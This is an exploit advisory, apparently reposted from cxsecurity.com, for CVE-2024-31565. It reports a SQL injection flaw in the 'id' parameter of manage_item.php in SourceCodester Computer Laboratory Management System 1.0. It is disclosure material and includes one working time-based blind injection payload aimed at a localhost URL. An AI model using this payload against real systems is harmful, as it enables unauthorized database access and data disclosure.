SourceCodester Computer Laboratory Management System 1.0 (manage_item.php) - SQL Injection
2024-8-22 03:27:5 Author: cxsecurity.com(查看原文) 阅读量:12 收藏

# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (manage_item.php) - SQL Injection # Date: 1 April 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html # Version: v1.0 # CVE: CVE-2024-31565 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- [Suggested description] Sourcecodester Computer Laboratory Management System 1.0 is vulnerable to SQL Injection via the 'id' parameter in /admin/item/manage_item.php?id=1'. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] SourceCodester ------------------------------------------ [Affected Product Code Base] SourceCodester Computer Laboratory Management System - 1.0 ------------------------------------------ [Affected Component] The functionality allowing users to manage the items information within the application. ------------------------------------------ [Attack Type] Local ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] To exploit this vulnerability, the following payload can be used to retrieve the data from the database id=1' AND (SELECT 6230 FROM (SELECT(SLEEP(5)))AYlp) AND 'raoS'='raoS on 'id' parameter on 'http://localhost/php-lms/admin/item/manage_item.php?id=1' ------------------------------------------ [Reference] https://www.strongboxit.com/ [Discoverer] Gnanaraj Mauviel with StrongBox IT Private Limited



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024080029
如有侵权请联系:admin#unsafe.sh